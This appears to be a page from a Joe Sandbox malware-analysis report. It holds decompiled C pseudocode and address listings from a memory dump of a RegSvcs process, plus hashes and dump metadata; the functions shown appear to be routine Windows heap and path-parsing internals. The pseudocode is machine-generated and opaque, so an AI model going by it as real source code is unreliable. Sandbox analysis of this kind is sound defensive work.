														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00FFF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00FFF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00FFFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00FFFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00FFF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00FFF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01084CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0100D130(_t427, _t494, _t511);
				}
			}

0x01085ba5
0x01085baa
0x01085baf
0x01085bb4
0x01085bb6
0x01085bbc
0x01085bbe
0x01085bc4
0x01085bcd
0x01085bd3
0x01085bd6
0x01085bdc
0x01085be0
0x01085be3
0x01085beb
0x01085bf2
0x01085bf8
0x01085bfe
0x01085c04
0x01085c0e
0x01085c18
0x01085c1f
0x01085c25
0x01085c2a
0x01085c2c
0x01085c32
0x01085c3a
0x01085c3f
0x01085c42
0x01085c48
0x01085c5b
0x01085c5b
0x01085c2c
0x01085cb7
0x01085cb9
0x01085cbf
0x01085cc2
0x01085cca
0x01085ccb
0x01085ccb
0x01085cd1
0x01085cd7
0x01085cda
0x01085ce1
0x01085ce4
0x01085ce7
0x01085ced
0x01085cf3
0x01085cf9
0x01085cff
0x01085d08
0x01085d0a
0x01085d0e
0x01085d10
0x00000000
0x00000000
0x01085d16
0x01085d1a
0x00000000
0x00000000
0x01085d20
0x01085d22
0x01085d25
0x01085d2f
0x01085d2f
0x01085d33
0x01085d3d
0x01085d49
0x01085d4b
0x00000000
0x00000000
0x01085d5a
0x01085d5d
0x01085d60
0x00000000
0x00000000
0x01085d66
0x01085d69
0x00000000
0x00000000
0x01085d6f
0x01085d6f
0x01085d73
0x01085d79
0x01085d7f
0x01085d86
0x01085d95
0x01085d98
0x01085dba
0x01085dcb
0x01085dce
0x01085dd3
0x01085dd6
0x01085dd8
0x01085de6
0x01085dec
0x01085dee
0x01085df1
0x01085df3
0x0108635a
0x0108635a
0x00000000
0x0108635a
0x01085dfe
0x01085e02
0x01085e05
0x01085e07
0x01085e10
0x01085e13
0x01085e1b
0x01085e1c
0x01085e21
0x01085e22
0x01085e23
0x01085e25
0x01085e2a
0x01085e2c
0x01085e2e
0x01085e36
0x01085e39
0x01085e42
0x01085e47
0x01085e4d
0x01085e54
0x01085e54
0x01085e54
0x01085e2e
0x01085e5c
0x01085e5f
0x01085e62
0x01085e64
0x01085e6b
0x01085e70
0x01085e7a
0x01085e7a
0x01085e7a
0x01085e6b
0x01085e7e
0x01085e7f
0x01085e7f
0x01085e81
0x01085e87
0x01085e8b
0x01085e8c
0x01085e8c
0x01085e8c
0x01085e9a
0x01085e9c
0x01085ea2
0x01085ea6
0x01085f50
0x01085f50
0x01085f57
0x01085f66
0x01085f66
0x01085f66
0x01085f68
0x01085f6a
0x010863d0
0x00000000
0x01085f70
0x01085f70
0x01085f91
0x01085f9c
0x01085f9e
0x01085fa4
0x01085fa6
0x0108638c
0x01086392
0x010863a1
0x010863a7
0x010863af
0x010863af
0x010863bd
0x010863d8
0x00000000
0x010863d8
0x01085fac
0x01085fb2
0x01085fb4
0x01085fbd
0x01085fc6
0x01085fce
0x01085fd4
0x01085fdc
0x01085fec
0x01085fed
0x01085fee
0x01085fef
0x01085ff9
0x01085ffa
0x01085ffb
0x01085ffc
0x01086000
0x01086004
0x01086012
0x01086012
0x01086018
0x01086019
0x0108601a
0x0108601b
0x0108601c
0x01086020
0x01086059
0x0108605c
0x01086061
0x01086061
0x01086022
0x01086022
0x01086022
0x01086025
0x0108602a
0x0108602b
0x01086031
0x01086037
0x01086038
0x0108603e
0x01086048
0x01086049
0x0108604a
0x0108604b
0x0108604c
0x0108604d
0x01086053
0x01086054
0x01086054
0x01086062
0x01086065
0x01086067
0x0108606a
0x01086070
0x01086075
0x01086076
0x01086081
0x01086087
0x01086095
0x01086099
0x0108609e
0x010860a4
0x010860ae
0x010860b0
0x010860b3
0x010860b6
0x010860b8
0x010860ba
0x010860ba
0x010860ba
0x010860ba
0x010860be
0x010860c0
0x010860c5
0x010860c5
0x010860c5
0x010860c6
0x010860cd
0x01086114
0x010860cf
0x010860cf
0x010860d4
0x010860d5
0x010860da
0x010860db
0x010860e1
0x010860e2
0x010860e8
0x010860f8
0x010860fd
0x010860fe
0x01086102
0x01086104
0x01086107
0x01086109
0x0108610b
0x0108610b
0x0108610b
0x0108610b
0x0108610f
0x0108610f
0x01086117
0x0108611a
0x0108611f
0x01086125
0x01086134
0x01086139
0x0108613f
0x01086146
0x01086148
0x0108614b
0x0108614d
0x0108614f
0x0108614f
0x0108614f
0x0108614f
0x01086153
0x01086159
0x01086159
0x0108615c
0x01086163
0x01086169
0x0108616c
0x01086172
0x01086181
0x01086186
0x01086187
0x0108618b
0x01086191
0x01086195
0x010861a3
0x010861bb
0x010861c0
0x010861c3
0x010861cc
0x010861d0
0x010861dc
0x010861de
0x010861e1
0x010861e4
0x010861e6
0x010861e8
0x010861e8
0x010861e8
0x010861e8
0x010861e6
0x010861ec
0x010861f3
0x01086203
0x01086209
0x0108620a
0x01086216
0x0108621d
0x01086227
0x01086241
0x01086246
0x0108624c
0x01086257
0x01086259
0x0108625c
0x0108625e
0x01086260
0x01086260
0x01086260
0x01086260
0x0108625e
0x01086264
0x01086267
0x01086269
0x01086315
0x01086315
0x0108631b
0x0108631e
0x01086324
0x01086327
0x0108632f
0x01086330
0x01086333
0x0108633a
0x0108633c
0x01086335
0x01086335
0x01086335
0x0108633f
0x01086342
0x0108634c
0x01086352
0x01086355
0x01086355
0x01086359
0x00000000
0x0108626f
0x01086275
0x01086275
0x01086278
0x0108627e
0x0108627e
0x01086281
0x01086287
0x0108628d
0x01086298
0x0108629c
0x010862a2
0x0108629e
0x0108629e
0x0108629e
0x010862a7
0x010862a7
0x010862aa
0x010862b0
0x010862f0
0x010862f0
0x010862f2
0x010862f8
0x010862fd
0x010862b2
0x010862b2
0x010862b2
0x010862b5
0x010862dd
0x010862e2
0x010862e5
0x010862b7
0x010862b8
0x010862bb
0x010862bd
0x010862c0
0x010862c4
0x010862cd
0x010862cd
0x010862c0
0x010862bb
0x010862b5
0x01086302
0x01086303
0x01086305
0x01086305
0x01086305
0x0108630c
0x0108630c
0x00000000
0x0108627e
0x01086269
0x01085eac
0x01085ebb
0x01085ebe
0x01085ecb
0x01085ecb
0x01085ece
0x01085ece
0x01085ed4
0x01085ed7
0x01085ed9
0x01085edb
0x01085edb
0x01085ee1
0x01085ee1
0x01085ee3
0x01085f20
0x01085f20
0x01085ee5
0x01085ee5
0x01085ee5
0x01085ee8
0x01085f11
0x01085f18
0x01085eea
0x01085eea
0x01085eed
0x01085ef2
0x01085ef8
0x01085efb
0x01085f0a
0x01085f0a
0x01085eed
0x01085ee8
0x01085f22
0x01085f28
0x00000000
0x00000000
0x01085f30
0x01085f31
0x01085f37
0x01085f3a
0x01085f3d
0x01085f44
0x00000000
0x00000000
0x00000000
0x01085f46
0x01085f48
0x01085f4d
0x00000000
0x01085f4d
0x01085dda
0x01085ddf
0x00000000
0x01085ddf
0x01085dd8
0x01085da7
0x01085da9
0x01085dac
0x01085dae
0x00000000
0x01085db4
0x01085db4
0x00000000
0x01085db4
0x01085dae
0x01085d88
0x01085d8d
0x01086363
0x01086369
0x0108636a
0x01086370
0x01086372
0x0108637a
0x0108637b
0x0108637d
0x00000000
0x00000000
0x0108637f
0x01086385
0x00000000
0x01086385
0x01085d38
0x01085d3b
0x00000000
0x00000000
0x00000000
0x01085d3b
0x01085d27
0x01085d29
0x00000000
0x00000000
0x00000000
0x01086360
0x00000000
0x01086360
0x01085c10
0x01085c10
0x010863da
0x010863e5
0x010863e5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b517fbf082d6d17b59378d6001dde36df76b4e7e3ccc540b6b7ee33d935171b4
Instruction ID: b9ba712f8dfd477756d04c38299aed9222e96f45a5bd85db02318b39389db202
Opcode Fuzzy Hash: b517fbf082d6d17b59378d6001dde36df76b4e7e3ccc540b6b7ee33d935171b4
Instruction Fuzzy Hash: 09425A71904229CFDB64DF68C880BAABBF1FF49304F1581EAD98DAB242D7359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FD4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00FD4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x10ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00FEF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00FD6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00FD4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00FD6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00FD45F8))) {
												case 0:
													_v568 = 0xf91078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xf911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00FD4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00FFF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00FFF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00FB52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00FCEB70(1, 0x10a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00FCAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00FF95D0();
																			L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00FFB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00FF3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00FFB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x00fd4128
0x00fd4135
0x00fd413c
0x00fd4141
0x00fd4145
0x00fd4147
0x00fd414e
0x00fd4151
0x00fd4159
0x00fd415c
0x00fd4160
0x00fd4164
0x00fd4168
0x00fd416c
0x00fd417f
0x00fd4181
0x00fd446a
0x00fd446a
0x00fd418c
0x00fd4195
0x00fd4199
0x00fd4432
0x00fd4439
0x00fd443d
0x00fd4442
0x00fd4447
0x00000000
0x00fd419f
0x00fd41a3
0x00fd41b1
0x00fd41b9
0x00fd41bd
0x00fd45db
0x00fd45db
0x00000000
0x00fd41c3
0x00fd41c3
0x00fd41ce
0x00fd41d4
0x0101e138
0x0101e13e
0x0101e169
0x0101e16d
0x0101e19e
0x0101e16f
0x0101e16f
0x0101e175
0x0101e179
0x0101e18f
0x0101e193
0x00000000
0x0101e199
0x00000000
0x0101e199
0x0101e193
0x00000000
0x00000000
0x00000000
0x00fd41da
0x00fd41da
0x00fd41df
0x00fd41e4
0x00fd41ec
0x00fd4203
0x00fd4207
0x0101e1fd
0x00fd4222
0x00fd4226
0x0101e1f3
0x0101e1f3
0x00fd422c
0x00fd422c
0x00fd4233
0x0101e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd4239
0x00fd4239
0x00fd4239
0x00fd4239
0x00fd4233
0x00fd4226
0x00fd41ee
0x00fd41ee
0x00fd41f4
0x00fd4575
0x0101e1b1
0x0101e1b1
0x00000000
0x00fd457b
0x00fd457b
0x00fd4582
0x0101e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd4588
0x00fd4588
0x00fd458c
0x0101e1c4
0x0101e1c4
0x00000000
0x00fd4592
0x00fd4592
0x00fd4599
0x0101e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd459f
0x00fd459f
0x00fd45a3
0x0101e1d7
0x0101e1e4
0x00000000
0x00fd45a9
0x00fd45a9
0x00fd45b0
0x0101e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd45b6
0x00fd45b6
0x00fd45b6
0x00000000
0x00fd45b6
0x00fd45b0
0x00fd45a3
0x00fd4599
0x00fd458c
0x00fd4582
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd41f4
0x00fd423e
0x00fd4241
0x00fd45c0
0x00fd45c4
0x00000000
0x00fd45ca
0x00fd45ca
0x00000000
0x0101e207
0x0101e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd45d1
0x00000000
0x00000000
